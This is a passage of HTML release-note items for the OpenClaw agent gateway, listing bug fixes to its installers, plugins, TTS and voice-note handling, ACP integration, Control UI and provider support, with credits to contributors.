<li>Gateway/update: warn before package updates and bundled plugin runtime-dependency repairs when the target volume appears low on disk space, without blocking installs on best-effort filesystem checks. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329551146" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71835" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71835/hovercard" href="https://github.com/openclaw/openclaw/issues/71835">#71835</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/abhinas90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/abhinas90">@abhinas90</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jsompis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jsompis">@jsompis</a>.</li>
<li>Plugins/runtime deps: surface activated plugin load failures in health and fail package-update restart verification or doctor repair when bundled runtime deps still cannot load, avoiding false-success repairs. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329764229" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71883" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71883/hovercard" href="https://github.com/openclaw/openclaw/pull/71883">#71883</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Solvely-Colin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Solvely-Colin">@Solvely-Colin</a>.</li>
<li>Gateway/Linux: include fnm <code>aliases/default/bin</code> in generated service PATHs and let doctor accept either modern fnm aliases or the legacy <code>current/bin</code> symlink, avoiding false PATH repair prompts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4283558641" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68169" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68169/hovercard" href="https://github.com/openclaw/openclaw/issues/68169">#68169</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/richard-scott/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/richard-scott">@richard-scott</a>.</li>
<li>Installer/Linux: run apt installs with noninteractive dpkg and needrestart settings so fresh Ubuntu 24.04 <code>curl | bash</code> installs do not hang while installing Node.js, Git, or build tools. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4046027578" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/41146" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/41146/hovercard" href="https://github.com/openclaw/openclaw/issues/41146">#41146</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/iht76/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/iht76">@iht76</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alexcarv318/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alexcarv318">@alexcarv318</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cs3gallery/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cs3gallery">@cs3gallery</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/firofame/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/firofame">@firofame</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cgdusek/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cgdusek">@cgdusek</a>.</li>
<li>Providers/Bedrock: defer the AWS SDK import until Bedrock discovery actually runs so plugin registration and setup stay lightweight on cold start. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328833605" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71690" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71690/hovercard" href="https://github.com/openclaw/openclaw/issues/71690">#71690</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jarvis-ai-gregmoser/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jarvis-ai-gregmoser">@jarvis-ai-gregmoser</a>.</li>
<li>Installer/macOS: stop immediately when Homebrew <code>node@24</code> installation fails and avoid printing PATH advice for missing Homebrew Node installs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4312670571" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70411" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70411/hovercard" href="https://github.com/openclaw/openclaw/issues/70411">#70411</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/1fanwang/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/1fanwang">@1fanwang</a>.</li>
<li>WhatsApp: remove ack reactions after a visible reply when <code>messages.removeAckAfterReply</code> is enabled, matching other reaction-capable channels. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3987412583" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/26183" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/26183/hovercard" href="https://github.com/openclaw/openclaw/issues/26183">#26183</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MrUnforsaken/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MrUnforsaken">@MrUnforsaken</a>.</li>
<li>Providers/Z.AI: map OpenClaw thinking controls to Z.AI's <code>thinking</code> payload and add opt-in preserved thinking replay via <code>params.preserveThinking</code>, so GLM 5.x can keep prior <code>reasoning_content</code> when requested. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4183616844" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58680" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/58680/hovercard" href="https://github.com/openclaw/openclaw/issues/58680">#58680</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/xuanmingguo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xuanmingguo">@xuanmingguo</a>.</li>
<li>Channels/status: keep read-only channel lists on manifest and package metadata by default, loading setup runtime only for explicit fallback callers. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins: scope setup and web-provider metadata manifest reads to explicit plugin ids when callers already know the owning plugin set. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/onboarding: defer onboarding install-record index writes until the guarded config commit so setup failures cannot leave the plugin index ahead of <code>openclaw.json</code>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/registry: resolve web provider ownership from the installed plugin index instead of broad manifest scans on secret, tool, and pricing paths. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Config/providers: accept <code>video</code> and <code>audio</code> in configured model <code>input</code> values and preserve them in provider catalog entries. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3961456155" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/20721" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/20721/hovercard" href="https://github.com/openclaw/openclaw/issues/20721">#20721</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alvinttang/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alvinttang">@alvinttang</a>.</li>
<li>Models/auth: honor the parent <code>--agent</code> flag for auth write commands (<code>add</code>, <code>login</code>, <code>setup-token</code>, <code>paste-token</code>, and the GitHub Copilot shortcut) so OAuth/API-key/token results are written to the requested agent store instead of the default agent. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329713315" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71864" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71864/hovercard" href="https://github.com/openclaw/openclaw/issues/71864">#71864</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329952100" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71933" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71933/hovercard" href="https://github.com/openclaw/openclaw/pull/71933">#71933</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/balric-seo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/balric-seo">@balric-seo</a>.</li>
<li>TTS: strip model-emitted TTS directives from streamed block text before channel delivery, including directives split across adjacent blocks, while preserving the accumulated raw reply for final-mode synthesis. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4038643518" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/38937" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/38937/hovercard" href="https://github.com/openclaw/openclaw/issues/38937">#38937</a>.</li>
<li>TTS: keep explicit <code>provider=...</code> directive keys scoped to that provider and warn on unsupported keys instead of letting another speech provider consume overlapping keys. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4198945704" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60131" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/60131/hovercard" href="https://github.com/openclaw/openclaw/issues/60131">#60131</a>.</li>
<li>TTS/Feishu: normalize final-mode streamed TTS-only audio before delivery so generated voice-note files use the same safe media path and native voice routing as normal final replies. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329908441" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71920" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71920/hovercard" href="https://github.com/openclaw/openclaw/issues/71920">#71920</a>.</li>
<li>Feishu: transcribe inbound voice-note audio with the shared media audio path before agent dispatch and keep raw Feishu <code>file_key</code> payloads out of message text. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4268134631" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67120" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67120/hovercard" href="https://github.com/openclaw/openclaw/issues/67120">#67120</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4211680654" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61876" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/61876/hovercard" href="https://github.com/openclaw/openclaw/issues/61876">#61876</a>.</li>
<li>Tasks: terminalize async Gateway agent task records from the Gateway run result while preserving aborted, failed, and cancelled outcomes instead of leaving completed runs stuck as active or lost. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329869944" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71905" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71905/hovercard" href="https://github.com/openclaw/openclaw/pull/71905">#71905</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/likewen-tech/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/likewen-tech">@likewen-tech</a>.</li>
<li>WhatsApp: let authorized group voice-note transcripts satisfy mention gating before reply dispatch, while keeping unmentioned transcripts in pending group history. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4069891043" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/44908" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/44908/hovercard" href="https://github.com/openclaw/openclaw/issues/44908">#44908</a>.</li>
<li>Media understanding: carry channel voice-note preflight state into attachment selection so WhatsApp, Feishu, Telegram, and Discord do not transcribe the same inbound audio twice. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4315503496" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70580" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70580/hovercard" href="https://github.com/openclaw/openclaw/issues/70580">#70580</a>.</li>
<li>TTS/BlueBubbles: deliver compatible auto-TTS audio as iMessage voice memo bubbles instead of plain MP3/CAF file attachments. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3943170481" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/16848" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/16848/hovercard" href="https://github.com/openclaw/openclaw/issues/16848">#16848</a>.</li>
<li>TTS: resolve voice-note and voice-memo routing from channel plugin capabilities instead of speech-core-owned channel id lists.</li>
<li>ACP: send subagent and async-task completion wakes to external ACP harnesses as plain prompts instead of OpenClaw internal runtime-context envelopes, while keeping those envelopes out of ACP transcripts.</li>
<li>TTS/status: show configured TTS model, voice, and sanitized custom endpoint in <code>/status</code>, preserve OpenAI-compatible TTS instructions on custom endpoints, and retry empty Microsoft/Edge TTS output once. Addresses <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4076830177" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/46602" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/46602/hovercard" href="https://github.com/openclaw/openclaw/issues/46602">#46602</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4078185482" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/47232" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/47232/hovercard" href="https://github.com/openclaw/openclaw/pull/47232">#47232</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4063664533" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/43936" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/43936/hovercard" href="https://github.com/openclaw/openclaw/pull/43936">#43936</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/leekuangtao/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/leekuangtao">@leekuangtao</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Huntterxx/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Huntterxx">@Huntterxx</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rex993/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rex993">@rex993</a>.</li>
<li>Agents/Gateway: steer agent-driven config edits and restarts through the owner-only <code>gateway</code> tool, document <code>config.schema.lookup</code> as the field-doc source, and warn against using <code>gateway stop &amp;&amp; gateway start</code> as a restart substitute on macOS. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329939344" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71929" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71929/hovercard" href="https://github.com/openclaw/openclaw/issues/71929">#71929</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ygc3817922006-sketch/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ygc3817922006-sketch">@ygc3817922006-sketch</a>.</li>
<li>Media understanding/audio: inject a deterministic transcript placeholder for too-small voice notes so agents do not hallucinate transcription or provider failures. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4087777845" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/48944" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/48944/hovercard" href="https://github.com/openclaw/openclaw/issues/48944">#48944</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/eulicesl/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/eulicesl">@eulicesl</a>.</li>
<li>Providers/vLLM: send Nemotron 3 chat-template kwargs when thinking is off and honor configured <code>params.chat_template_kwargs</code> for OpenAI-compatible completions, so vLLM/Nemotron replies stay visible instead of becoming thinking-only. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329813098" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71891" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71891/hovercard" href="https://github.com/openclaw/openclaw/issues/71891">#71891</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jmystaki-create/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jmystaki-create">@jmystaki-create</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dennis-lynch/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dennis-lynch">@dennis-lynch</a>.</li>
<li>Channels/replies: strip copied inbound metadata blocks from user-facing assistant replies and model replay history, so Discord/vLLM sessions do not leak <code>Conversation info</code> / <code>UNTRUSTED ... message body</code> envelopes after a model echoes them. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329636801" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71847" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71847/hovercard" href="https://github.com/openclaw/openclaw/issues/71847">#71847</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jmystaki-create/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jmystaki-create">@jmystaki-create</a>.</li>
<li>Subagents/memory: keep inter-session completion wakes out of memory and dreaming session exports, and strip internal runtime-context blocks from realtime Control UI chat events.</li>
<li>Agents/Claude: treat zero-token empty <code>stop</code> turns as failed provider output, retry once, repair replay, and allow configured model fallback instead of preserving them as successful silent replies. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329762708" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71880" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71880/hovercard" href="https://github.com/openclaw/openclaw/issues/71880">#71880</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MagnaAI/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MagnaAI">@MagnaAI</a>.</li>
<li>Tasks: normalize task lifecycle timestamps at create, update, and restore time, and report retained lost tasks as audit warnings until their cleanup window expires. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329725948" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71871" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71871/hovercard" href="https://github.com/openclaw/openclaw/pull/71871">#71871</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/likewen-tech/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/likewen-tech">@likewen-tech</a>.</li>
<li>Diagnostics/OTEL: treat normal early model stream cleanup as a completed model call instead of exporting a misleading <code>StreamAbandoned</code> error span. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Gateway/pairing: stop corrupt or unreadable device/node pairing stores from being treated as empty state, preserving <code>paired.json</code> for repair instead of overwriting approved pairings. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329738661" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71873" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71873/hovercard" href="https://github.com/openclaw/openclaw/issues/71873">#71873</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/iret77/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/iret77">@iret77</a>.</li>
<li>ACP: keep <code>/acp</code> management commands, plus local <code>/status</code> and <code>/unfocus</code>, on the Gateway path inside ACP-bound threads so they are not consumed as ACP prompt text. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4259260856" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66298" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66298/hovercard" href="https://github.com/openclaw/openclaw/issues/66298">#66298</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kindomLee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kindomLee">@kindomLee</a>.</li>
<li>ACPX: stop probing ACP agents during normal Gateway startup; the embedded backend now registers without spawning Codex/ACP child processes unless <code>OPENCLAW_ACPX_RUNTIME_STARTUP_PROBE=1</code> is explicitly set.</li>
<li>CLI/image edit: accept <code>--size</code>, <code>--aspect-ratio</code>, and <code>--resolution</code> on <code>openclaw infer image edit</code> and report all supported edit flags from <code>capability inspect image.edit</code>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Pinghuachiu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Pinghuachiu">@Pinghuachiu</a>.</li>
<li>ACP: wait for the configured runtime backend to become healthy before startup identity reconciliation, avoiding transient acpx warnings during Gateway boot. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4043233380" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/40566" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/40566/hovercard" href="https://github.com/openclaw/openclaw/issues/40566">#40566</a>.</li>
<li>Channels/ACP bindings: time out configured binding readiness checks instead of letting Discord preflight hang forever when an ACP target never settles. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4289732408" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68776" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68776/hovercard" href="https://github.com/openclaw/openclaw/issues/68776">#68776</a>.</li>
<li>Control UI: hide the chat loading skeleton during background history reloads when existing messages or active stream content are already visible, avoiding reload flashes on high-latency local gateways. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329620242" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71844" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71844/hovercard" href="https://github.com/openclaw/openclaw/issues/71844">#71844</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/WolvenRA/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/WolvenRA">@WolvenRA</a>.</li>
<li>Control UI: keep locally optimistic chat messages visible when a history reload temporarily returns empty, avoiding lost first-turn messages on high-latency gateways. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329761362" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71878" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71878/hovercard" href="https://github.com/openclaw/openclaw/issues/71878">#71878</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/WolvenRA/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/WolvenRA">@WolvenRA</a>.</li>
<li>Control UI: keep chat history limits based on visible messages after filtering heartbeat and control-only transcript rows, so recent hidden entries no longer make older visible replies disappear. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/WolvenRA/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/WolvenRA">@WolvenRA</a>.</li>
<li>Agents/images: scrub old <code>[media attached: ...]</code>, <code>[Image: source: ...]</code>, and <code>media://inbound/...</code> markers from pruned model replay context so stale media refs are not rehydrated as fresh prompt images. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329723266" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71868" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71868/hovercard" href="https://github.com/openclaw/openclaw/issues/71868">#71868</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jmeadlock/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jmeadlock">@jmeadlock</a>.</li>
<li>Docker/Bonjour: disable Bonjour/mDNS advertising by default for bundled Compose gateways on bridge networking, while keeping host/macvlan opt-in with <code>OPENCLAW_DISABLE_BONJOUR=0</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329762622" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71879" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71879/hovercard" href="https://github.com/openclaw/openclaw/issues/71879">#71879</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/gbballpack/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/gbballpack">@gbballpack</a>.</li>
<li>CLI/status: label the OpenClaw Serve/Funnel setting as <code>Tailscale exposure</code> and show daemon state separately when available, so <code>gateway.tailscale.mode: "off"</code> no longer reads like the Tailscale daemon is stopped. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329371669" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71790" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71790/hovercard" href="https://github.com/openclaw/openclaw/issues/71790">#71790</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pesvobodak/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pesvobodak">@pesvobodak</a>.</li>
<li>Plugins/Bonjour: stop ciao mDNS watchdog failures from looping forever when the advertiser stays stuck in <code>probing</code> or <code>announcing</code>; Bonjour now disables itself for the current Gateway process after repeated failed restarts while the Gateway keeps running. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4291316152" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69011" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69011/hovercard" href="https://github.com/openclaw/openclaw/issues/69011">#69011</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/siddharthaagarwalofficial-ux/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/siddharthaagarwalofficial-ux">@siddharthaagarwalofficial-ux</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/FiredMosquito831/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/FiredMosquito831">@FiredMosquito831</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/spikefcz/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/spikefcz">@spikefcz</a>.</li>
<li>Gateway/Fly.io: seed Control UI allowed origins from the actual runtime bind and port so CLI-driven non-loopback starts do not crash before config exists. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329508985" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71823" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71823/hovercard" href="https://github.com/openclaw/openclaw/issues/71823">#71823</a>.</li>
<li>macOS/remote SSH: keep discovered gateway hosts in <code>gateway.remote.sshTarget</code> while pinning SSH transport URLs to the local loopback tunnel, so browser automation does not regress into blocked non-loopback <code>ws://</code> endpoints. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4270922535" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67336" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67336/hovercard" href="https://github.com/openclaw/openclaw/issues/67336">#67336</a>.</li>
<li>Gateway/proxy: bootstrap env proxy dispatching from direct Gateway startup so provider and plugin network requests honor <code>HTTPS_PROXY</code>/<code>HTTP_PROXY</code> before the first embedded agent attempt runs. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329545167" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71833" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71833/hovercard" href="https://github.com/openclaw/openclaw/pull/71833">#71833</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mjamiv/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mjamiv">@mjamiv</a>.</li>
